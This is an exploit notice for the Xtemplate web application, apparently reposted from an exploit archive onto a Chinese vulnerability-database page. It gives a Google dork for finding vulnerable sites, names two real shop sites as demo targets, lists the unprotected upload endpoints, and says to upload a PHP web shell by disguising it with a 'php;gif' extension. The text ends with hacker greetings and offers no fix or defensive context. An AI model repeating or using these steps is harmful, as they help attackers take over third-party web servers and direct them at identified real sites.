Xtemplate Shell Upload

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047340 漏洞类型
发布时间 2012-06-05 更新时间 2012-06-05
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012060040
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
##################################################
# Exploit Title: [Xtemplate shell upload]
#Date: 4/6/12
# Author: [Th3-Skywalk3r]
# Email : th3skywalk3r@hotmail.com
# Category:: [ webapps]
# Google dork: [ /xtemplates/eng/]
# Tested on: [Windows 7 & BT5r2 ]
# Demo site: [http://www.deadseashop.co.il/inc/xtemplates/eng/file_edit.php]
[http://www.sealsand.co.il/inc/xtemplates/eng/file_edit.php]
##################################################

[~] P0c [~] :

uploader link : 
http://target.com/inc/xtemplates/eng/ads_gallery_update.php
http://target.com/inc/xtemplates/eng/file_edit.php

Upload Your Shell : php;gif  & Enjoy .

##########################################################
[] Greetz to :
                     
[ Th3 Dir3ct0rY, Th3 R00t3r, Hunt009s , Er00r-TGH, Z3r0-TGH, ] 
[ Teamgreyhat ]             
[ And all my Freinds And Greyhat hackers]
       
##########################################################